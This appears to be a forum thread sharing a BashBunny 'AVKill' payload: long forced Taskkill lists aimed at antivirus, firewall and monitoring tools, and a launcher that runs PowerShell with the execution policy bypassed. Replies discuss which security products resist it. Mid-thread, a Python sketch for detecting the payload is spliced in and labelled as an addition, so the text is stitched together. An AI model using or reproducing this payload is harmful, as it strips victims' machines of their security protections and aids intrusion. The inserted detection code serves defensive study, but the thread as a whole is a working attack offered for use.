Taskkill /T /F /IM avxquar.exe /IM backweb.exe /IM bargains.exe /IM bd_professional.exe /IM beagle.exe /IM belt.exe /IM bidef.exe /IM bidserver.exe /IM bipcp.exe /IM bipcpevalsetup.exe
Taskkill /T /F /IM bisp.exe /IM blackd.exe /IM blackice.exe /IM blink.exe /IM blss.exe /IM bootconf.exe /IM bootwarn.exe /IM borg2.exe /IM bpc.exe /IM brasil.exe /IM bs120.exe
Taskkill /T /F /IM bundle.exe /IM bvt.exe /IM ccapp.exe /IM ccevtmgr.exe /IM ccpxysvc.exe /IM cdp.exe /IM cfd.exe /IM cfgwiz.exe /IM cfiadmin.exe /IM cfiaudit.exe /IM cfinet.exe
Taskkill /T /F /IM cfinet32.exe /IM claw95.exe /IM claw95cf.exe /IM clean.exe /IM cleaner.exe /IM cleaner3.exe /IM cleanpc.exe /IM click.exe /IM cmesys.exe
Taskkill /T /F /IM cmgrdian.exe /IM cmon016.exe /IM connectionmonitor.exe /IM cpd.exe /IM cpf9x206.exe /IM cpfnt206.exe /IM ctrl.exe /IM cv.exe /IM cwnb181.exe /IM cwntdwmo.exe
Taskkill /T /F /IM datemanager.exe /IM dcomx.exe /IM defalert.exe /IM defscangui.exe /IM defwatch.exe /IM deputy.exe /IM divx.exe /IM dllcache.exe /IM dllreg.exe /IM doors.exe
Taskkill /T /F /IM dpf.exe /IM dpfsetup.exe /IM dpps2.exe /IM drwatson.exe /IM drweb32.exe /IM drwebupw.exe /IM dssagent.exe /IM dvp95.exe /IM dvp95_0.exe /IM ecengine.exe
Taskkill /T /F /IM efpeadm.exe /IM emsw.exe /IM ent.exe /IM esafe.exe /IM escanhnt.exe /IM escanv95.exe /IM espwatch.exe /IM ethereal.exe /IM etrustcipe.exe /IM evpn.exe
Taskkill /T /F /IM exantivirus-cnet.exe /IM exe.avxw.exe /IM expert.exe /IM explore.exe /IM f-agnt95.exe /IM f-prot.exe /IM f-prot95.exe /IM f-stopw.exe /IM fameh32.exe /IM fast.exe
Taskkill /T /F /IM fch32.exe /IM fih32.exe /IM findviru.exe /IM firewall.exe /IM fnrb32.exe /IM fp-win.exe /IM fp-win_trial.exe /IM fprot.exe /IM frw.exe /IM fsaa.exe /IM fsav.exe
Taskkill /T /F /IM fsav32.exe /IM fsav530stbyb.exe /IM fsav530wtbyb.exe /IM fsav95.exe /IM fsgk32.exe /IM fsm32.exe /IM fsma32.exe /IM fsmb32.exe /IM gator.exe /IM gbmenu.exe
Taskkill /T /F /IM gbpoll.exe /IM generics.exe /IM gmt.exe /IM guard.exe /IM guarddog.exe /IM hacktracersetup.exe /IM hbinst.exe /IM hbsrv.exe /IM hotactio.exe /IM hotpatch.exe
Taskkill /T /F /IM htlog.exe /IM htpatch.exe /IM hwpe.exe /IM hxdl.exe /IM hxiul.exe /IM iamapp.exe /IM iamserv.exe /IM iamstats.exe /IM ibmasn.exe /IM ibmavsp.exe /IM icload95.exe
Taskkill /T /F /IM icloadnt.exe /IM icmon.exe /IM icsupp95.exe /IM icsuppnt.exe /IM idle.exe /IM iedll.exe /IM iedriver.exe /IM iexplorer.exe /IM iface.exe /IM ifw2000.exe
Taskkill /T /F /IM inetlnfo.exe /IM infus.exe /IM infwin.exe /IM init.exe /IM intdel.exe /IM intren.exe /IM iomon98.exe /IM istsvc.exe /IM jammer.exe /IM jdbgmrg.exe /IM jedi.exe
Taskkill /T /F /IM kavlite40eng.exe /IM kavpers40eng.exe /IM kavpf.exe /IM kazza.exe /IM keenvalue.exe /IM kerio-pf-213-en-win.exe /IM kerio-wrl-421-en-win.exe /IM kerio-wrp-421-en-win.exe
Taskkill /T /F /IM kernel32.exe /IM killprocesssetup161.exe /IM launcher.exe /IM ldnetmon.exe /IM ldpro.exe /IM ldpromenu.exe /IM ldscan.exe /IM lnetinfo.exe /IM loader.exe
Taskkill /T /F /IM localnet.exe /IM lockdown.exe /IM lockdown2000.exe /IM lookout.exe /IM lordpe.exe /IM lsetup.exe /IM luall.exe /IM luau.exe /IM lucomserver.exe /IM luinit.exe
Taskkill /T /F /IM luspt.exe /IM mapisvc32.exe /IM mcagent.exe /IM mcmnhdlr.exe /IM mcshield.exe /IM mctool.exe /IM mcupdate.exe /IM mcvsrte.exe /IM mcvsshld.exe /IM md.exe
Taskkill /T /F /IM mfin32.exe /IM mfw2en.exe /IM mfweng3.02d30.exe /IM mgavrtcl.exe /IM mgavrte.exe /IM mghtml.exe /IM mgui.exe /IM minilog.exe /IM mmod.exe /IM monitor.exe
Taskkill /T /F /IM moolive.exe /IM mostat.exe /IM mpfagent.exe /IM mpfservice.exe /IM mpftray.exe /IM mrflux.exe /IM msapp.exe /IM msbb.exe /IM msblast.exe /IM mscache.exe
Taskkill /T /F /IM msccn32.exe /IM mscman.exe /IM msconfig.exe /IM msdm.exe /IM msdos.exe /IM msiexec16.exe /IM msinfo32.exe /IM mslaugh.exe /IM msmgt.exe /IM msmsgri32.exe
Taskkill /T /F /IM mssmmc32.exe /IM mssys.exe /IM msvxd.exe /IM mu0311ad.exe /IM mwatch.exe /IM n32scanw.exe /IM nav.exe /IM navap.navapsvc.exe /IM navapsvc.exe /IM navapw32.exe
Taskkill /T /F /IM navdx.exe /IM navlu32.exe /IM navnt.exe /IM navstub.exe /IM navw32.exe /IM navwnt.exe /IM nc2000.exe /IM ncinst4.exe /IM ndd32.exe /IM neomonitor.exe
Taskkill /T /F /IM neowatchlog.exe /IM netarmor.exe /IM netd32.exe /IM netinfo.exe /IM netmon.exe /IM netscanpro.exe /IM netspyhunter-1.2.exe /IM netstat.exe /IM netutils.exe
Taskkill /T /F /IM nisserv.exe /IM nisum.exe /IM nmain.exe /IM nod32.exe /IM normist.exe /IM norton_internet_secu_3.0_407.exe /IM notstart.exe /IM npf40_tw_98_nt_me_2k.exe
Taskkill /T /F /IM npfmessenger.exe /IM nprotect.exe /IM npscheck.exe /IM npssvc.exe /IM nsched32.exe /IM nssys32.exe /IM nstask32.exe /IM nsupdate.exe /IM nt.exe /IM ntrtscan.exe
Taskkill /T /F /IM ntvdm.exe /IM ntxconfig.exe /IM nui.exe /IM nupgrade.exe /IM nvarch16.exe /IM nvc95.exe /IM nvsvc32.exe /IM nwinst4.exe /IM nwservice.exe /IM nwtool16.exe
Taskkill /T /F /IM ollydbg.exe /IM onsrvr.exe /IM optimize.exe /IM ostronet.exe /IM otfix.exe /IM outpost.exe /IM outpostinstall.exe /IM outpostproinstall.exe /IM padmin.exe
Taskkill /T /F /IM panixk.exe /IM patch.exe /IM pavcl.exe /IM pavproxy.exe /IM pavsched.exe /IM pavw.exe /IM pccwin98.exe /IM pcfwallicon.exe /IM pcip10117_0.exe /IM pcscan.exe
Taskkill /T /F /IM pdsetup.exe /IM periscope.exe /IM persfw.exe /IM perswf.exe /IM pf2.exe /IM pfwadmin.exe /IM pgmonitr.exe /IM pingscan.exe /IM platin.exe /IM pop3trap.exe
Taskkill /T /F /IM poproxy.exe /IM popscan.exe /IM portdetective.exe /IM portmonitor.exe /IM powerscan.exe /IM ppinupdt.exe /IM pptbc.exe /IM ppvstop.exe /IM prizesurfer.exe
Taskkill /T /F /IM prmt.exe /IM prmvr.exe /IM procdump.exe /IM processmonitor.exe /IM procexplorerv1.0.exe /IM programauditor.exe /IM proport.exe /IM protectx.exe /IM pspf.exe
Taskkill /T /F /IM purge.exe /IM qconsole.exe /IM qserver.exe /IM rapapp.exe /IM rav7.exe /IM rav7win.exe /IM rav8win32eng.exe /IM ray.exe /IM rb32.exe /IM rcsync.exe /IM realmon.exe
Taskkill /T /F /IM reged.exe /IM regedit.exe /IM regedt32.exe /IM rescue.exe /IM rescue32.exe /IM rrguard.exe /IM rshell.exe /IM rtvscan.exe /IM rtvscn95.exe /IM rulaunch.exe
Taskkill /T /F /IM run32dll.exe /IM rundll.exe /IM rundll16.exe /IM ruxdll32.exe /IM safeweb.exe /IM sahagent.exe /IM save.exe /IM savenow.exe /IM sbserv.exe /IM sc.exe /IM scam32.exe
Taskkill /T /F /IM scan32.exe /IM scan95.exe /IM scanpm.exe /IM scrscan.exe /IM serv95.exe /IM setup_flowprotector_us.exe /IM setupvameeval.exe /IM sfc.exe /IM sgssfw32.exe
Taskkill /T /F /IM sh.exe /IM shellspyinstall.exe /IM shn.exe /IM showbehind.exe /IM smc.exe /IM sms.exe /IM smss32.exe /IM soap.exe /IM sofi.exe /IM sperm.exe /IM spf.exe
Taskkill /T /F /IM sphinx.exe /IM spoler.exe /IM spoolcv.exe /IM spoolsv32.exe /IM spyxx.exe /IM srexe.exe /IM srng.exe /IM ss3edit.exe /IM ssg_4104.exe /IM ssgrate.exe /IM st2.exe
Taskkill /T /F /IM start.exe /IM stcloader.exe /IM supftrl.exe /IM support.exe /IM supporter5.exe /IM svc.exe /IM svchostc.exe /IM svchosts.exe /IM svshost.exe /IM sweep95.exe
Taskkill /T /F /IM sweepnet.sweepsrv.sys.swnetsup.exe /IM symproxysvc.exe /IM symtray.exe /IM sysedit.exe /IM system.exe /IM system32.exe /IM sysupd.exe /IM taskmg.exe /IM taskmgr.exe
Taskkill /T /F /IM taskmo.exe /IM taskmon.exe /IM taumon.exe /IM tbscan.exe /IM tc.exe /IM tca.exe /IM tcm.exe /IM tds-3.exe /IM tds2-98.exe /IM tds2-nt.exe /IM teekids.exe
Taskkill /T /F /IM tfak.exe /IM tfak5.exe /IM tgbob.exe /IM titanin.exe /IM titaninxp.exe /IM tracert.exe /IM trickler.exe /IM trjscan.exe /IM trjsetup.exe /IM trojantrap3.exe
Taskkill /T /F /IM tsadbot.exe /IM tvmd.exe /IM tvtmd.exe /IM undoboot.exe /IM updat.exe /IM update.exe /IM upgrad.exe /IM utpost.exe /IM vbcmserv.exe /IM vbcons.exe
Taskkill /T /F /IM vbust.exe /IM vbwin9x.exe /IM vbwinntw.exe /IM vcsetup.exe /IM vet32.exe /IM vet95.exe /IM vettray.exe /IM vfsetup.exe /IM vir-help.exe /IM virusmdpersonalfirewall.exe
Taskkill /T /F /IM vnlan300.exe /IM vnpc3000.exe /IM vpc32.exe /IM vpc42.exe /IM vpfw30s.exe /IM vptray.exe /IM vscan40.exe /IM vscenu6.02d30.exe /IM vsched.exe /IM vsecomr.exe
Taskkill /T /F /IM vshwin32.exe /IM vsisetup.exe /IM vsmain.exe /IM vsmon.exe /IM vsstat.exe /IM vswin9xe.exe /IM vswinntse.exe /IM vswinperse.exe /IM w32dsm89.exe /IM w9x.exe
Taskkill /T /F /IM watchdog.exe /IM webdav.exe /IM webscanx.exe /IM webtrap.exe /IM wfindv32.exe /IM whoswatchingme.exe /IM wimmun32.exe /IM win-bugsfix.exe /IM win32.exe
Taskkill /T /F /IM win32us.exe /IM winactive.exe /IM window.exe /IM windows.exe /IM wininetd.exe /IM wininitx.exe /IM winlogin.exe /IM winmain.exe /IM winnet.exe /IM winppr32.exe
Taskkill /T /F /IM winrecon.exe /IM winservn.exe /IM winssk32.exe /IM winstart.exe /IM winstart001.exe /IM wintsk32.exe /IM winupdate.exe /IM wkufind.exe /IM wnad.exe /IM wnt.exe
Taskkill /T /F /IM wradmin.exe /IM wrctrl.exe /IM wsbgate.exe /IM wupdater.exe /IM wupdt.exe /IM wyvernworksfirewall.exe /IM xpf202en.exe /IM zapro.exe /IM zapsetup3001.exe
Taskkill /T /F /IM zatutor.exe /IM
zonalm2601.exe /IM zonealarm.exe

And to make it all come together.

start.cmd

@echo off
cls
REM Change AVKill.ps1 to AVKill.cmd if you prefer batch based files.
powershell.exe -executionpolicy bypass "%~dp0\AVKill.ps1" >NUL
@exit

Until next time, when I get some more free time..
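For defenders, the payload in the post above leaves a recognisable trail in process-creation logs: a hidden, policy-bypassing PowerShell that locates a volume by label, followed by forced Taskkill calls that each name many images. The sketch below is an added example, not part of the original post; the event shape, field names, drive letter, switch folder, rule names and threshold are assumptions, and the sample events are constructed.

```python
import re

# Constructed process-creation events (shape loosely modelled on Sysmon Event ID 1).
# Field names, drive letter and switch folder are assumptions for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
TK = r"C:\Windows\System32\taskkill.exe"
EVENTS = [
    {"image": PS, "cmd": r"""powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\start.cmd')" """},
    {"image": PS, "cmd": r'powershell.exe -executionpolicy bypass "E:\payloads\switch1\AVKill.ps1"'},
    {"image": TK, "cmd": "Taskkill /T /F /IM dpf.exe /IM dpfsetup.exe /IM dpps2.exe "
                         "/IM drwatson.exe /IM drweb32.exe /IM drwebupw.exe"},
    {"image": TK, "cmd": "taskkill /F /IM notepad.exe"},                      # benign
    {"image": PS, "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},  # benign
]

BULK_KILL_THRESHOLD = 5  # assumed cut-off: one forced kill naming this many images is unusual


def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()


def detect(event):
    """Return the set of rule names tripped by one process-creation event."""
    cmd, image, hits = event["cmd"], basename(event["image"]), set()
    if image == "taskkill.exe":
        targets = re.findall(r"/IM\s+(\S+)", cmd, re.I)
        forced = re.search(r"(^|\s)/F(\s|$)", cmd, re.I)
        if forced and len(targets) >= BULK_KILL_THRESHOLD:
            hits.add("bulk_forced_taskkill")
    if image in ("powershell.exe", "pwsh.exe"):
        # PowerShell accepts abbreviated parameter names (-ep, -exec, -w ...).
        if re.search(r"-(ep|ex\w*)\s+bypass", cmd, re.I):
            hits.add("ps_policy_bypass")
        if re.search(r"-w\w*\s+hidden", cmd, re.I):
            hits.add("ps_hidden_window")
        # Resolving a drive by volume label is how the payload finds its own storage.
        if re.search(r"win32_volume.*label=", cmd, re.I):
            hits.add("ps_volume_label_lookup")
    return hits


def triage(events):
    """Return [(index, sorted rule names)] for every event that trips a rule."""
    return [(i, sorted(h)) for i, e in enumerate(events) if (h := detect(e))]


if __name__ == "__main__":
    for index, rules in triage(EVENTS):
        print(index, ", ".join(rules))
```

A policy bypass on its own is common in legitimate administration, so the single-rule hits are best treated as context and the combinations as the alert.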
Dave-ee Jones Posted September 19, 2017

Interesting. Isn't the AV meant to stop scripts from running? Why can't it stop this one? Also, some AVs don't allow you to stop them (e.g. Trend Micro comes up with the password thing when you try and kill it).
InfoSecREDD Posted September 19, 2017 Author

Lol that's the reason for 1.2.1.. Had a lot of fun rewriting it.. Pretty much if it's the .cmd version it doesn't kill CMD.. if it's the .ps1 version it doesn't kill PowerShell. I use this actually as a header to some scripts I have, just thought it's "appropriate" to post this time. Lol.
JediMasterX Posted September 20, 2017

THANK YOU... started believing the forum is dead lol... will try it out asap (bought my second bunny for no real reason and still have not used it such a NOOB) JMX
InfoSecREDD Posted September 20, 2017 Author

Nah we are very much alive.. but my BashBunny just bricked so I'm out of Development for the moment.
InfoSecREDD Posted September 21, 2017 Author

Well good news, Support is gonna send me a new BashBunny. So I can continue to give you guys payloads.. yay... Lol..
Dave-ee Jones Posted September 21, 2017

1 hour ago, Ar1k88 said: "Well good news, Support is gonna send me a new BashBunny. So I can continue to give you guys payloads.. yay... Lol.."

Nice! Good to hear it.
PoSHMagiC0de Posted September 21, 2017

Avast and Vipre will not be affected by this. Avast processes deny even system level access from killing them. The service will prompt if you try and stop or kill it in any way. The BB could do it but it will need a quack command to manually click yes after trying to stop it.
JediMasterX Posted October 2, 2017

Glad to hear you are getting another bb. So funny that hak5 forum, and all my learning is like meeting with a secret love, I'm feeling 16yo again hehe. RL is too demanding... lolz JMX
JediMasterX Posted October 19, 2017

Seems to fail on Eset Sec 10, trying to figure out why...
Dviros Posted November 6, 2017

Hi, What about AVs that are running as SYSTEM? It cannot be killed even when running as an admin.
Dviros Posted November 6, 2017

Also, here's my syntax: (I cannot paste it over here) https://pastebin.com/G8PAJLxG
InfoSecREDD Posted November 13, 2017 Author

On 11/5/2017 at 11:39 PM, Dviros said: "Also, here's my syntax: (I cannot paste it over here) https://pastebin.com/G8PAJLxG"

I like that.. I've been super busy with my work but I'm currently looking on leaving.. So more time for me to code.. This was just a rework of the Ruby metasploit avkill post exploit script.. But I agree it needs to be worked on. :)
Archived
This topic is now archived and is closed to further replies.